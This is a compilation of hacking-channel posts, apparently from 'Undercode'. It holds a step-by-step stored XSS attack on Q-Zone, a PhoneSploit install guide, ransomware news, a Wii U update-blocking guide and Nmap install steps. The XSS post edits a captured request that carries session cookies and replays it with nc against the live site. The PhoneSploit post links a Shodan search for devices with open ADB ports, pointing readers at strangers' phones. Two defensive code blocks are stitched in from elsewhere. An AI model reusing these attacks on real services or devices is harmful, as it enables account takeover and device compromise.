UNDERCODE COMMUNITY

🦑Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode

1) Q-Zone filters user input

After entering Q-Zone, click "Settings → Space Settings → Space Name" in turn, where the display name of the space can be modified. If we write executable script code here and the filtering is not strict, it will be saved into the home page and executed in the browser of whoever views it. Let's first test whether we can write cross-site scripts in this input box:

2) When entering the code "<script>alert("test")</script>" in the "Input Space Name" input box, I found that the input box limits the length of the input: only 24 characters can be entered in total. And when we enter code of the permitted length and click Submit, a dialog box saying "Please do not include "<>" etc. characters in the input" pops up. It seems that Q-Zone filters the user's input.

3) Check the input filtering method of Q-Zone

Click "View → Source File" on the Q-Zone page. Near the beginning of the code, you can see the following segment:

if (!checkFormValue(form1)) return false;
len = StrLenOfAscii(form1.spacename.value) / 2;
if (len > 12) {
    // prompts that the name is too long (body not shown in the post)
}

4) Users with a little ASP programming foundation should be able to understand this code. The "StrLenOfAscii()" function obtains the length of the user input in ASCII characters; that value is divided by 2 and assigned to the len variable. If len is greater than 12, the code prompts that the name is too long. The most important line is the one before it, "if (!checkFormValue(form1)) return false": the "checkFormValue()" function can be inferred to check whether the input data contains special characters. When it detects filtered characters in the data, the aforementioned dialog box pops up.

5) Through analysis, we can be sure that Q-Zone filters the user input data on the client side.

written by undercode

🦑Exploitation of Q-Zone cross-site vulnerability:
t.me/UndercodeTesting


1) Since Q-Zone filters the user input data on the client, it leaves us an opening: we can bypass the client-side limits and modify the input data directly before submission. But Q-Zone imposes another restriction on submitted data: it does not accept submissions from external sites, so an HTML copy of the form saved locally cannot submit data normally. Therefore, we must find another way to modify the submitted data.

2) We first run a program called WSockExpert. After starting WSockExpert, click the "Open" button on the toolbar to display the current process list. If you opened Q-Zone from the QQ panel, select "QQ.exe → **'s home" in the process list; if you opened Q-Zone with IE, find the corresponding process among the IE processes. Then click the "Open" button to start monitoring the data exchanged with the website server.

3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890", at "space name", and then click "Submit". Back in WSockExpert, click the third row near the "send" data column, and you can see the content of the submitted data:

4) "Content-Length: 20

Cookie: pvid=1575119174; portalentryurl=http://vnet.qq.com/hn/; zzpaneluin=41346583; zzpanelkey=753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver=1305; skey=; uin=g

spacename=1234567890"

"Cookie" is the content of the cookie, which contains the user authentication; "spacename=1234567890" is the space name data we submitted; and the preceding "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.

3) Modify the submitted data

After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename=1234567890" to "spacename=<script>alert("test")</script>" and "Content-Length: 20" to "Content-Length: 40".

4) Now as long as we submit this data to the server, we bypass the client's data filtering. This requires another tool called NC.

Copy the "1.txt" saved above to the same folder as "nc.exe", open a command prompt window in Windows, change to the folder where nc.exe is located, and enter "nc -vv q-zone.qq.com 80 < 1.txt". After the command is executed, our modified data has been submitted to the remote server.

> We can change "Test" to any Chinese text, but we need to convert it to IE code first. For example, the IE code for "Test" is "%B2%E2%CA%D4".

5) Examine the results of code execution

Open our Q-Zone, and a prompt window pops up automatically. It means that we have successfully inserted the "<script>alert("test")</script>" code into the remote webpage! At the same time, on the page for modifying the space name, you can see that the originally restricted space name has been submitted and saved.

written by undercode
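The two Q-Zone posts above show a filter that exists only in the browser, so a replayed request never meets it. As an added example (not code from the post or from Q-Zone), here is the same check enforced on the server together with output encoding; the behaviour of `StrLenOfAscii`, the forbidden-character set and the GB2312 form charset are assumptions inferred from the post:

```python
import html
import unicodedata
from urllib.parse import parse_qs

MAX_UNITS = 12             # the page's client script rejects len > 12
FORBIDDEN = set("<>\"'&")  # assumption: the post only says '"<>" etc.'

def ascii_width(text):
    """Assumed StrLenOfAscii behaviour: 1 per ASCII char, 2 per other char."""
    return sum(1 if ord(ch) < 128 else 2 for ch in text)

def validate_spacename(name):
    """Server-side copy of the client checks; returns (ok, reason)."""
    if not name:
        return False, "empty"
    if any(unicodedata.category(ch) == "Cc" for ch in name):
        return False, "control character"
    if FORBIDDEN & set(name):
        return False, "forbidden character"
    if ascii_width(name) / 2 > MAX_UNITS:
        return False, "too long"
    return True, "ok"

def handle_update(body, charset="gb2312"):
    """Validate a raw form body as received, whatever client sent it."""
    try:
        fields = parse_qs(body, keep_blank_values=True,
                          encoding=charset, errors="strict")
    except UnicodeDecodeError:
        return 400, "bad encoding"
    values = fields.get("spacename", [])
    if len(values) != 1:
        return 400, "expected exactly one spacename"
    ok, reason = validate_spacename(values[0])
    return (200, values[0]) if ok else (400, reason)

def render_spacename(stored):
    """Encode on output too, so a value stored before the fix stays inert."""
    return '<h1 id="spacename">%s</h1>' % html.escape(stored, quote=True)

if __name__ == "__main__":
    # Constructed request bodies modelled on the capture in the post.
    for body in ("spacename=1234567890",
                 'spacename=<script>alert("test")</script>',
                 "spacename=%B2%E2%CA%D4",
                 "spacename=" + "a" * 25):
        print(body, "->", handle_update(body))
```

The Referer restriction mentioned in the post does not replace this check, because the replayed request carries the original Referer header.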

🦑EXPLOIT
> updated - Using open Adb ports we can exploit a device
termux(root)-linux✅

🦑INSTALLATION & RUN:

1) git clone https://github.com/Zucccs/PhoneSploit

2) extract adb.rar to the phonesploit directory

3) cd PhoneSploit

4) pip install colorama

5) python2 main.py

6) If adb is not found:
sudo apt update && sudo apt install android-tools-adb android-tools-fastboot


7) Using open Adb ports we can exploit a device
you can find open ports here https://www.shodan.io/search?query=android+debug+bridge+product%3A”Android+Debug+Bridge”

@undercodeTesting
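The exposure this post relies on is adbd listening on a network port. As an added example (not part of the original post or of PhoneSploit), the following audits the output of `adb shell getprop` from a device you administer and reports the properties that create that exposure; the sample dumps are constructed:

```python
import re

# One line of `getprop` output looks like: [key]: [value]
PROP_LINE = re.compile(r"^\[(?P<key>[^\]]+)\]:\s*\[(?P<val>[^\]]*)\]\s*$")

def parse_getprop(text):
    """Turn a getprop dump into a dict, skipping lines that do not parse."""
    props = {}
    for line in text.splitlines():
        match = PROP_LINE.match(line.strip())
        if match:
            props[match.group("key")] = match.group("val")
    return props

def tcp_port(value):
    """Return the port if the property enables TCP listening, else None."""
    try:
        port = int(value)
    except (TypeError, ValueError):
        return None
    return port if 0 < port < 65536 else None

def audit_adb(props):
    """List the settings that expose adbd, most serious first."""
    findings = []
    for key in ("service.adb.tcp.port", "persist.adb.tcp.port"):
        port = tcp_port(props.get(key))
        if port:
            findings.append("%s=%d: adbd listens on the network" % (key, port))
    if props.get("ro.adb.secure") == "0":
        findings.append("ro.adb.secure=0: no host key authorization")
    if props.get("ro.debuggable") == "1":
        findings.append("ro.debuggable=1: debuggable build, adb can run as root")
    return findings

# Constructed sample dumps (not taken from a real device).
EXPOSED = """[ro.adb.secure]: [0]
[ro.debuggable]: [1]
[ro.product.model]: [Example]
[service.adb.tcp.port]: [5555]"""
HARDENED = """[ro.adb.secure]: [1]
[ro.debuggable]: [0]
[service.adb.tcp.port]: [-1]"""

if __name__ == "__main__":
    for name, dump in (("exposed", EXPOSED), ("hardened", HARDENED)):
        print(name, audit_adb(parse_getprop(dump)))
```

On a device that reports a TCP port, `adb usb` switches adbd back to USB-only listening.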

🦑Ransomware attacks the largest U.S. ATM supplier - NEWS

1) Diebold Nixdorf, the largest ATM supplier in the United States, was attacked by ransomware.

2) The company stated that the hackers failed to access ATMs or customer networks and affected only its corporate network. Diebold has 35,000 employees, and its ATMs have an estimated global market share of 35%. It also produces point-of-sale systems and software used by retailers.

3) The attack occurred on the evening of April 25. The security team detected abnormal behavior on the corporate network and immediately took action to isolate systems in the network and prevent the spread of the malicious program. The company said the ransomware did not affect its customer network. The ransomware that got into Diebold's corporate network is called ProLock. Diebold said it did not pay the ransom to the attackers. Security experts say it may be better to do so, because the current version of ProLock decryption tools can damage large files such as databases.

@undercodeTesting

🦑Block Wii U System Updates (Without DNS Blocking!)


🦑Requirements:

> A Wii U & SD: Firmware and SD size don't matter as long as you satisfy the other conditions
> Mocha or Haxchi
> HBL on SD card
> ftpiiu_everywhere (Haxchi) on SD card
> Access to HBL: Browserhax, Haxchi/CBHC, or any other form of entry point are all fine, as long as you can access it.
> A PC with FTP client: Technically it doesn't have to be a PC. It can even be done on your phone with an FTP client. I'm using the PC for the simplicity of it. FileZilla IS RECOMMENDED.
Optional: Use Nand Dumper to back up your NAND with all its contents, as well as dumping the OTP and SEEPROM. By having those, you can unbrick your system with a hardmod at any point. Dumping MLC will require a 64GB SD card if your Wii U is 32GB, or a 16GB SD card if your Wii U is 8GB.

A1) Using Haxchi/CBHC:

System Menu: Have Haxchi reboot to System menu.
System Menu: Launch HBL via Haxchi or browser.
HBL: Launch ftpiiu_everywhere.

2) Proceed to section of the guide to block updates. Proceed to section "3)" if you want to unblock them again.

B) Using Mocha:
1) System Menu: Launch HBL via browser.
2) HBL: Start Mocha (using the default values is fine)
3) System Menu: Launch HBL via browser again.
4) HBL: Launch ftpiiu_everywhere.
5) Proceed to section "

6) Modifying your Nand, and blocking updates:
7) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.
8) PC: Once connected, Navigate to: "storage_mlc/sys/"

9) PC: Locate the "update" folder, right-click it and pick "File Permissions". Make sure the permissions are the same as in the screenshot below. If they are not the same, make a note of them; you will need them if you want to enable updates later. If they are the same, proceed to the next step.
Now:
1) PC: Delete the "update" folder.

2) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.

3) Wii U: Exit Mii Maker, and click on system settings.

4) System Settings: Attempt to update your Wii U as normal. A few seconds after it starts and the progress bar appears, it should give this error code: 105-3012. If the progress bar actually continues to move, TURN OFF THE WII U IMMEDIATELY!! Recheck your steps, because something went wrong.


🦑 Unblocking updates of Wii U:

If, for whatever reason, you would like to return the Wii U to its original updating state, start by following "1A)" or "1B)" of the guide, then proceed to the next step of this section:

1) PC: Use an FTP client to connect to your Wii U using the IP address and port on your Wii U screen.

2) PC: Once connected, Navigate to: "storage_mlc/sys/"

3) PC: Right-click, and select "Create Directory". Create the "update" folder. Once created, right-click again, and select "File Permissions".

4) PC: When you originally did section > , if your permissions were the same as the screenshot in that section, enter those same permissions here. If not, then you should have noted them down somewhere. Enter those values instead, then click OK.

5) Wii U: Press "Home" button to get back to HBL, press it again to get back to Mii Maker.

6) Wii U: Exit Mii Maker, and click on system settings.

7) System Settings: Attempt to update your Wii U as normal. It should proceed to update normally.

@undercodeTesting
🦑How to install Nmap in Termux

You can install Nmap in Termux by typing a few commands.
If you have already installed Termux from the Play Store, open Termux and type the command below:

1) termux-setup-storage

You will be asked to give Termux permission for storage access.

After that, type the command below:

2) apt update && apt upgrade
You will then be asked whether to update packages to newer versions, so simply type y for yes and hit Enter.

3) To install Nmap, type the command below:

pkg install nmap

That's all; you have successfully installed Nmap in Termux.